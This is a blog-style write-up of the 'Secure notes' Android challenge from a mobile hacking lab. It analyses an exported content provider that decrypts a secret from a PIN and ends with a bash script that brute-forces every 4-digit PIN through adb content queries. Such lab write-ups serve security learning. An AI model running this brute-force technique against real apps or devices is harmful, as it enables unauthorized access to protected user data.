Secure notes
Hello everyone , In this blog post , I will try to explain my solution steps for Secure notes challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
Let’s Examine the
AndroidMainfest.xml
After That i found 2 Providers (
com.mobilehackinglab.securenotes.secretprovider
-androidx.startup.InitializationProvider
) and 1 exported Activity (MainActivity
)image.png The
MainActivity
interact with a content provider, to validate a PIN and retrieve a secret value associated with that PIN.there is a listener set on a
submitPinButton
,when click the code call
onCreate$lambda$0 ()
function ,,then it , which retrieves the text from
pinEditText
then use
querySecretProvider
to validate the entered pin
Let’s analysis the
com.mobilehackinglab.securenotes.SecretDataProvider
:first of all the correct Pin use a key to decrypt the data stored in
config.properties
filethen let’s keep going in our code
it take a query string
check for if it null , return null
if there is a value then remove the prefix and then extract the int number from it
in the end it invoke the
decryptSecret()
if the Cursor return valid , the code look for
secret column
to query the pinIf a valid cursor is returned and data is available, the code looks for a column named
"Secret"
, expecting this to hold the result of the query.
Let’s back to the
config.properties
file and try to decrypt it manualLet’s try to brute force the pinget the decrypted Text
#!/bin/bash # Define the content provider URI CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider" # Loop through all 4-digit PIN combinations (0000 to 9999) for pin in $(seq -w 0000 9999); do echo "Trying PIN: $pin" # Use ADB to send the query command to the content provider adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" # Check the output to see if it indicates a successful attempt # Assuming "Secret" is returned upon success, otherwise adjust the condition if adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" | grep -q "Secret"; then echo "PIN found: $pin" break fi done


Last updated